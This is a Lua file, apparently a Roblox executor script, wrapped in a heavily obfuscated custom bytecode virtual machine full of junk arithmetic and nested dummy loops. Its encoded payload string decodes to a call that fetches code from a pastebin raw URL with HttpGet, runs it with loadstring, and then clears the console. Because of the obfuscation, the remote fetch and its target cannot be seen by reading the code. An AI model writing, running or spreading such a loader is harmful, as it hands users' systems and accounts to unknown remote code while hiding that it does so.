do
	local v0 = tonumber;
	local v1 = string.byte;
	local v2 = string.char;
	local v3 = string.sub;
	local v4 = string.gsub;
	local v5 = string.rep;
	local v6 = table.concat;
	local v7 = table.insert;
	local v8 = getfenv or function()
		return _ENV;
	end;
	local v9 = setmetatable;
	local v10 = pcall;
	local v11 = select;
	local v12 = unpack or table.unpack;
	local v13 = tonumber;
	local function v14(v15, v16)
		local v17 = 1;
		local v18;
		v15 = v4(v3(v15, 5), "..", function(v29)
			if (v1(v29, 2) == 79) then
				local v63 = 0;
				while true do
					if (v63 == 0) then
						v18 = v0(v3(v29, 1, 1));
						return "";
					end
				end
			else
				local v64 = 0;
				local v65;
				while true do
					if (v64 == 0) then
						v65 = v2(v0(v29, 16));
						if v18 then
							local v77 = v5(v65, v18);
							v18 = nil;
							return v77;
						else
							return v65;
						end
						break;
					end
				end
			end
		end);
		local function v19(v30, v31, v32)
			if v32 then
				local v66 = (v30 / ((4 - 2) ^ (v31 - ((1 + 0) - 0)))) % ((4 - 2) ^ (((v32 - (1400 - (456 + 943))) - (v31 - (1 + 0))) + (453 - (63 + 389))));
				return v66 - (v66 % (1339 - (235 + 1103)));
			else
				local v67 = (1 + 1) ^ (v31 - (69 - ((173 - 114) + 9)));
				return (((v30 % (v67 + v67)) >= v67) and (1 + 0)) or 0;
			end
		end
		local function v20()
			local v37 = 654 - (92 + 30 + 532);
			local v38;
			while true do
				if (v37 == 0) then
					v38 = v1(v15, v17, v17);
					v17 = v17 + 1 + 0;
					v37 = 2 - 1;
				end
				if (v37 == (3 - (1 + 1))) then
					return v38;
				end
			end
		end
		local function v21()
			local v39 = 0 + 0;
			local v40;
			local v41;
			while true do
				if (v39 == 0) then
					v40, v41 = v1(v15, v17, v17 + (610 - (115 + 493)));
					v17 = v17 + ((5958 - 4280) - (476 + 1200));
					v39 = 1 - 0;
				end
				if (v39 == 1) then
					return (v41 * (447 - (11 + 154 + 26))) + v40;
				end
			end
		end
		local function v22()
			local v42, v43, v44, v45 = v1(v15, v17, v17 + (985 - (453 + 529)));
			v17 = v17 + 4;
			return (v45 * (16778094 - (798 + 33 + 47))) + (v44 * (58954 + 6582)) + (v43 * ((1780 - 1124) - 400)) + v42;
		end
		local function v23()
			local v46 = v22();
			local v47 = v22();
			return ((-(1 + (1 - 0)) * v19(v47, 58 - 26)) + 1 + 0) * (2 ^ (v19(v47, 18 + 3, 1261 - (541 + 689)) - (1139 - ((257 - 142) + 1)))) * ((((v19(v47, 1 + 0, 73 - 53) * (2 ^ ((19 + 28) - 15))) + v46) / ((5 - 3) ^ (43 + 9))) + 1 + 0);
		end
		local function v24(v33)
			local v48;
			if not v33 then
				v33 = v22();
				if (v33 == 0) then
					return "";
				end
			end
			v48 = v3(v15, v17, (v17 + v33) - (1 + 0));
			v17 = v17 + v33;
			local v49 = {};
			for v60 = 419 - (68 + 350), #v48 do
				v49[v60] = v2(v1(v3(v48, v60, v60)));
			end
			return v6(v49);
		end
		local v25 = v22;
		local function v26(...)
			return {...}, v11("#", ...);
		end
		local function v27()
			local v50 = 0;
			local v51;
			local v52;
			local v53;
			local v54;
			local v55;
			local v56;
			while true do
				local v62 = 435 - (339 + 96);
				while true do
					if (v62 ~= 0) then
					else
						if ((916 - (271 + 644)) ~= v50) then
						else
							local v74 = 1547 - (1191 + 356);
							while true do
								if ((1691 - (1320 + 371)) == v74) then
									local v94 = 0;
									while true do
										if (v94 == 1) then
											v74 = 2 - 1;
											break;
										end
										if (v94 ~= 0) then
										else
											v55 = v22();
											v56 = {};
											v94 = 1;
										end
									end
								end
								if (v74 == (288 - (214 + 72))) then
									v50 = 2;
									break;
								end
								if (v74 ~= 1) then
								else
									for v96 = 2 - 1, v55 do
										local v97 = 1453 - (289 + 1164);
										local v98;
										local v99;
										local v100;
										local v101;
										local v102;
										while true do
											if (v97 == 1) then
												v100 = nil;
												v101 = nil;
												v97 = 1 + 1;
											end
											if (v97 == (808 - (388 + 418))) then
												v102 = nil;
												while true do
													if (v98 ~= 1) then
													else
														v101 = nil;
														v102 = nil;
														v98 = 2;
													end
													if (v98 == 2) then
														while true do
															if (v99 == 1) then
																v102 = nil;
																while true do
																	if (v100 == 1) then
																		if (v101 == 1) then
																			v102 = v20() ~= (858 - (628 + 230));
																		elseif (v101 == (9 - 7)) then
																			v102 = v23();
																		elseif (v101 == (4 - 1)) then
																			v102 = v24();
																		end
																		v56[v96] = v102;
																		break;
																	end
																	if (v100 ~= 0) then
																	else
																		local v124 = 452 - (265 + 187);
																		local v125;
																		local v126;
																		while true do
																			if (0 == v124) then
																				v125 = 157 - (95 + 62);
																				v126 = nil;
																				v124 = 1585 - (290 + 1294);
																			end
																			if (v124 == (1 - 0)) then
																				while true do
																					if ((0 + 0) ~= v125) then
																					else
																						v126 = 0 + 0;
																						while true do
																							if (v126 ~= (0 - 0)) then
																							else
																								local v150 = 952 - (757 + 195);
																								while true do
																									if (v150 == 0) then
																										local v162 = 0;
																										while true do
																											if (v162 ~= (0 + 0)) then
																											else
																												v101 = v20();
																												v102 = nil;
																												v162 = 1;
																											end
																											if (v162 ~= 1) then
																											else
																												v150 = 1;
																												break;
																											end
																										end
																									end
																									if (v150 ~= (2 - 1)) then
																									else
																										v126 = 730 - (77 + 652);
																										break;
																									end
																								end
																							end
																							if (v126 == (335 - (17 + 317))) then
																								v100 = 1 + 0;
																								break;
																							end
																						end
																						break;
																					end
																				end
																				break;
																			end
																		end
																	end
																end
																break;
															end
															if (v99 ~= 0) then
															else
																local v117 = 0;
																while true do
																	if (v117 ~= 0) then
																	else
																		local v127 = 1315 - (377 + 938);
																		while true do
																			if (v127 == 1) then
																				v117 = 1;
																				break;
																			end
																			if (v127 ~= (1604 - (1534 + 70))) then
																			else
																				v100 = 0 - 0;
																				v101 = nil;
																				v127 = 1;
																			end
																		end
																	end
																	if (v117 == (1 + 0)) then
																		v99 = 1;
																		break;
																	end
																end
															end
														end
														break;
													end
													if (v98 == 0) then
														local v114 = 0 - 0;
														while true do
															if (1 == v114) then
																v98 = 1;
																break;
															end
															if (v114 == 0) then
																v99 = 0 - 0;
																v100 = nil;
																v114 = 1 + 0;
															end
														end
													end
												end
												break;
											end
											if (0 == v97) then
												v98 = 0 - 0;
												v99 = nil;
												v97 = 1;
											end
										end
									end
									v54[3] = v20();
									v74 = 2;
								end
							end
						end
						if (v50 == (6 - 4)) then
							local v75 = 0 + 0;
							while true do
								if (v75 == (1350 - (745 + 605))) then
									for v103 = 2 - 1, v22() do
										local v104 = 0;
										local v105;
										local v106;
										local v107;
										while true do
											if (v104 == (1 + 0)) then
												v107 = nil;
												while true do
													if (v105 == 0) then
														v106 = 0;
														v107 = nil;
														v105 = 2 - 1;
													end
													if (v105 ~= 1) then
													else
														while true do
															if (v106 == 0) then
																v107 = v20();
																if (v19(v107, 1 - 0, 1 + 0) == (0 + 0)) then
																	local v118 = 0;
																	local v119;
																	local v120;
																	local v121;
																	local v122;
																	while true do
																		if (v118 ~= 0) then
																		else
																			v119 = 0 + 0;
																			v120 = nil;
																			v118 = 1 + 0;
																		end
																		if (v118 ~= 1) then
																		else
																			v121 = nil;
																			v122 = nil;
																			v118 = 1325 - (563 + 760);
																		end
																		if ((1873 - (1383 + 488)) ~= v118) then
																		else
																			while true do
																				if (v119 == (4 - 1)) then
																					if (v19(v121, 1 + 2, 3) == 1) then
																						v122[10 - 6] = v56[v122[4]];
																					end
																					v51[v103] = v122;
																					break;
																				end
																				if (v119 == 2) then
																					local v145 = 0 - 0;
																					while true do
																						if (v145 ~= (0 - 0)) then
																						else
																							local v149 = 0;
																							while true do
																								if (v149 ~= 1) then
																								else
																									v145 = 1 + 0;
																									break;
																								end
																								if (v149 ~= 0) then
																								else
																									if (v19(v121, 1, 1) ~= 1) then
																									else
																										v122[2] = v56[v122[2]];
																									end
																									if (v19(v121, 475 - (245 + 228), 2) ~= 1) then
																									else
																										v122[3] = v56[v122[3]];
																									end
																									v149 = 1;
																								end
																							end
																						end
																						if (v145 == (1039 - (446 + 592))) then
																							v119 = 508 - (201 + 304);
																							break;
																						end
																					end
																				end
																				if (v119 ~= 0) then
																				else
																					v120 = v19(v107, 2 + 0, 1601 - (1591 + 7));
																					v121 = v19(v107, 1 + 3, 6);
																					v119 = 1;
																				end
																				if (v119 == (1 + 0)) then
																					v122 = {v21(),v21(),nil,nil};
																					if (v120 == (1473 - (354 + 1119))) then
																						local v147 = 351 - (93 + 258);
																						while true do
																							if (0 ~= v147) then
																							else
																								v122[1813 - (1619 + 191)] = v21();
																								v122[4 + 0] = v21();
																								break;
																							end
																						end
																					elseif (v120 == 1) then
																						v122[1486 - (661 + 822)] = v22();
																					elseif (v120 == 2) then
																						v122[3] = v22() - (2 ^ 16);
																					elseif (v120 == 3) then
																						local v165 = 0;
																						local v166;
																						local v167;
																						while true do
																							if (v165 == (0 + 0)) then
																								v166 = 0;
																								v167 = nil;
																								v165 = 1 + 0;
																							end
																							if (v165 ~= 1) then
																							else
																								while true do
																									if (v166 == (1660 - (1066 + 594))) then
																										v167 = 0;
																										while true do
																											if (v167 ~= 0) then
																											else
																												v122[3] = v22() - ((2 + 0) ^ 16);
																												v122[4] = v21();
																												break;
																											end
																										end
																										break;
																									end
																								end
																								break;
																							end
																						end
																					end
																					v119 = 1 + 1;
																				end
																			end
																			break;
																		end
																	end
																end
																break;
															end
														end
														break;
													end
												end
												break;
											end
											if (v104 == 0) then
												v105 = 161 - (84 + 77);
												v106 = nil;
												v104 = 1 + 0;
											end
										end
									end
									for v108 = 1 + 0, v22() do
										v52[v108 - 1] = v27();
									end
									v75 = 1;
								end
								if (v75 == (1285 - (482 + 802))) then
									for v110 = 1, v22() do
										v53[v110] = v22();
									end
									return v54;
								end
							end
						end
						v62 = 776 - (52 + 723);
					end
					if (v62 ~= (2 - 1)) then
					else
						if (v50 == (0 - 0)) then
							local v76 = 0;
							while true do
								if ((1 + 0) ~= v76) then
								else
									v53 = {};
									v54 = {v51,v52,nil,v53};
									v76 = 2;
								end
								if (v76 == (690 - (359 + 329))) then
									v50 = 1 + 0;
									break;
								end
								if (v76 ~= 0) then
								else
									v51 = {};
									v52 = {};
									v76 = 677 - (329 + 347);
								end
							end
						end
						break;
					end
				end
			end
		end
		local function v28(v34, v35, v36)
			local v57 = v34[1];
			local v58 = v34[2];
			local v59 = v34[3];
			return function(...)
				local v68 = 0;
				local v69;
				local v70;
				local v71;
				local v72;
				local v73;
				while true do
					if (v68 == 3) then
						A, B = v26(v10(v73));
						if not A[1] then
							local v78 = v34[4][v69] or "?";
							error("Script error at [" .. v78 .. "]:" .. A[2]);
						else
							return v12(A, 2, B);
						end
						break;
					end
					if (v68 == 0) then
						v69 = 1;
						v70 = -1;
						v68 = 1;
					end
					if (v68 == 1) then
						v71 = {...};
						v72 = v11("#", ...) - 1;
						v68 = 2;
					end
					if (v68 == 2) then
						v73 = nil;
						function v73()
							local v79 = v57;
							local v80 = Const;
							local v81 = v58;
							local v82 = v59;
							local v83 = v26;
							local v84 = {};
							local v85 = {};
							local v86 = {};
							for v90 = 0, v72 do
								if (((1923 - (118 + 650)) < (19567 - 14963)) and (v90 >= v82)) then
									v84[v90 - v82] = v71[v90 + 1];
								else
									v86[v90] = v71[v90 + 1 + (0 - 0)];
								end
							end
							local v87 = (v72 - v82) + 1 + 0;
							local v88;
							local v89;
							while true do
								local v91 = 700 - (175 + (1062 - 537));
								local v92;
								local v93;
								while true do
									if ((v91 == 1) or (154 >= ((7628 - (266 + 601)) - 3254))) then
										while true do
											if (((11893 - 8592) == (4374 - (243 + 830))) and (v92 == (1546 - (411 + 1135)))) then
												v93 = 0 + 0;
												while true do
													if ((v93 == (1417 - (1378 + 38))) or ((19 + (2525 - (315 + 1562))) == (482 + 188))) then
														if ((v89 <= (1 + 2 + 0)) or ((3051 + 1058) <= (3138 - 1801))) then
															if (((4959 - 1331) <= (172 + 1756 + 1830)) and (v89 <= (1912 - (820 + 983 + 108)))) then
																if (((5991 - (1295 + 338)) >= (984 + 1078)) and (v89 > 0)) then
																	local v128 = 0 - (0 + 0);
																	local v129;
																	local v130;
																	while true do
																		if ((v128 == ((0 + 0) - 0)) or (145 == (3197 - 1653))) then
																			v129 = 0 - 0;
																			v130 = nil;
																			v128 = 1 - 0;
																		end
																		if (((2728 - (790 + 36 + 104)) > ((2704 - 1462) - (1156 + 78))) and (v128 == 1)) then
																			while true do
																				if (((1500 - (711 + 789)) == v129) or ((9356 - (4025 + 589)) <= (2616 - (1707 + 63)))) then
																					v130 = v88[2];
																					v86[v130] = v86[v130](v12(v86, v130 + 1 + 0 + 0, v70));
																					break;
																				end
																			end
																			break;
																		end
																	end
																else
																	v86[v88[2]]();
																end
															elseif (((1398 - (1018 + 65)) == ((2159 - (53 + 1891)) + 100)) and (v89 == 2)) then
																v69 = v88[(1011 - 310) - (488 + 210)];
															else
																local v131 = 0 - (1831 - (1241 + 590));
																local v132;
																local v133;
																local v134;
																local v135;
																while true do
																	if ((1015 == (758 + 230 + 27)) and (v131 == 2)) then
																		while true do
																			if (((10260 - 7172) >= (136 + 6 + 267)) and (v132 == (1 + 0))) then
																				v135 = nil;
																				while true do
																					if ((v133 == (87 - ((9 - 2) + 80))) or ((1404 - (302 + 409)) > (623 + 511))) then
																						local v155 = 0;
																						local v156;
																						while true do
																							if (((6011 - (790 + 1136)) > (5698 - (1093 + 708))) and (v155 == (0 + 0))) then
																								v156 = 0 - 0;
																								while true do
																									if ((v156 == (1355 - (163 + (1834 - 643)))) or ((900 - (102 + 124)) > 2146)) then
																										v133 = 138 - (44 + 93);
																										break;
																									end
																									if ((v156 == 0) or (1634 > (11145 - 6593))) then
																										local v169 = 1387 - (90 + 1297);
																										while true do
																											if ((v169 == 0) or (116 >= 1749)) then
																												v134 = v88[(3023 - 1227) - ((3328 - (346 + 1622)) + 434)];
																												v135 = v86[v88[3]];
																												v169 = 1 + 0;
																											end
																											if ((v169 == (1 + 0)) or (291 >= (3435 + 1044))) then
																												v156 = 4 - 3;
																												break;
																											end
																										end
																									end
																								end
																								break;
																							end
																						end
																					end
																					if ((v133 == 1) or ((104 + (1332 - 791)) > (579 + 2639 + (2715 - (798 + 562))))) then
																						v86[v134 + (3 - 2)] = v135;
																						v86[v134] = v135[v88[1 + 3]];
																						break;
																					end
																				end
																				break;
																			end
																			if ((v132 == (0 - 0)) or ((21 + (568 - (388 + 109))) > (4329 - (285 + (3190 - 2303))))) then
																				v133 = 1061 - (441 + 620);
																				v134 = nil;
																				v132 = 1 + 0;
																			end
																		end
																		break;
																	end
																	if ((((6254 - 3970) - (12 + 87)) == (8535 - 6350)) and (v131 == ((2 - 1) - 0))) then
																		v134 = nil;
																		v135 = nil;
																		v131 = 2;
																	end
																	if ((v131 == (0 + 0)) or ((6398 - (1553 + 43)) <= 1680)) then
																		v132 = 0 + 0;
																		v133 = nil;
																		v131 = (835 - (545 + 289)) + 0;
																	end
																end
															end
														elseif (((1057 + 1451) <= (1795 + 3039)) and (v89 <= (7 - 2))) then
															if (((309 + 351) < (664 + 313)) and (v89 == (4 + 0))) then
																if (((20 + 2113) <= (6950 - (2418 + 815))) and (v86[v88[5 - 3]] == v88[(1073 - (240 + 829)) + (1156 - (207 + 949))])) then
																	v69 = v69 + ((12 - 9) - 2);
																else
																	v69 = v88[9 - (7 - 1)];
																end
															else
																v86[v88[(99 + 480) - (316 + 152 + 109)]] = v36[v88[3 + 0]];
															end
														elseif ((v89 <= 6) or ((11349 - 8295) == (2073 - (181 + 153)))) then
															do
																return;
															end
														elseif ((v89 > 7) or ((388 + 1155) >= (2383 + 2 + 23))) then
															v86[v88[242 - (23 + (1726 - (357 + 1152)))]] = v88[2 + 1];
														else
															local v138 = 0 + 0;
															local v139;
															local v140;
															local v141;
															local v142;
															local v143;
															while true do
																if (((1790 - (1221 + 568)) == v138) or (3245 > (4010 + 978))) then
																	v141 = nil;
																	v142 = nil;
																	v138 = 1 + 1;
																end
																if (((1193 + 859) < (3457 - (937 + 243))) and ((292 - (89 + 201)) == v138)) then
																	v143 = nil;
																	while true do
																		if ((((4740 - 2255) - 1629) < ((2285 + 1793) - (246 + 1264))) and (v139 == (1231 - ((2395 - 1359) + (1392 - (971 + 227)))))) then
																			local v152 = 0 - 0;
																			while true do
																				if ((v152 == (2 - 1)) or ((4772 - (1037 + 433)) == ((5044 + 3153) - 4944))) then
																					v139 = 2 - (0 - 0);
																					break;
																				end
																				if ((v152 == ((0 - 0) - 0)) or (337 == (4082 - (781 + (1612 - 757))))) then
																					v70 = (v142 + v140) - (1596 - (1380 + 215));
																					v143 = 0;
																					v152 = 1;
																				end
																			end
																		end
																		if ((v139 == 2) or ((8961 - 5970) == (11658 - 7015))) then
																			for v159 = v140, v70 do
																				local v160 = 1861 - (1128 + 733);
																				while true do
																					if ((1943 < (4269 - (176 + 560))) and (v160 == (0 + 0))) then
																						v143 = v143 + (1 - 0);
																						v86[v159] = v141[v143];
																						break;
																					end
																				end
																			end
																			break;
																		end
																		if (((517 + 2886) >= (362 - (440 - 199))) and (v139 == ((0 - 0) - 0))) then
																			v140 = v88[922 - ((1541 - 1212) + 591)];
																			v141, v142 = v83(v86[v140](v12(v86, v140 + 1 + 0, v88[7 - 4])));
																			v139 = 821 - (89 + 731);
																		end
																	end
																	break;
																end
																if ((v138 == (0 - 0)) or ((2624 - ((2019 - (96 + 1844)) + 1797)) > 2859)) then
																	v139 = 0 + 0;
																	v140 = nil;
																	v138 = 1 + (1518 - (746 + 772));
																end
															end
														end
														v69 = v69 + 1;
														break;
													end
													if ((((4504 + 1985) - (3494 - (34 + 39))) >= 367) and (v93 == (0 - 0))) then
														local v115 = 0 - 0;
														local v116;
														while true do
															if (((5191 - (168 + 49)) >= (3412 - (1084 + 150))) and ((1074 - (15 + 1059)) == v115)) then
																v116 = 0 + 0;
																while true do
																	if ((v116 == ((2493 - 1830) - (532 + 131))) or ((2548 + 1363) < (1625 + 531))) then
																		v88 = v79[v69];
																		v89 = v88[1094 - (400 + 693)];
																		v116 = 1;
																	end
																	if (((422 + 406) > (2184 - (1449 + 278))) and (v116 == (2 - (1 + 0)))) then
																		v93 = 2 - (1 - 0);
																		break;
																	end
																end
																break;
															end
														end
													end
												end
												break;
											end
										end
										break;
									end
									if (((2685 - (16 + 1822)) >= (1819 - (408 + 689))) and ((681 - (114 + (919 - (29 + 323)))) == v91)) then
										v92 = 0;
										v93 = nil;
										v91 = 1;
									end
								end
							end
						end
						v68 = 3;
					end
				end
			end;
		end
		return v28(v27(), {}, v16)();
	end
	v14("LOL!063O00028O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F4447686A34385465030D3O0072636F6E736F6C65636C656172000F3O0012083O00013O0026043O0001000100010004023O00010001001205000100023O001205000200033O002003000200020004001208000400054O0007000200044O000100013O00024O000100010001001205000100066O0001000100010004023O000E00010004023O000100012O00063O00017O000F3O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00063O00073O00083O000A3O00", v8());
end
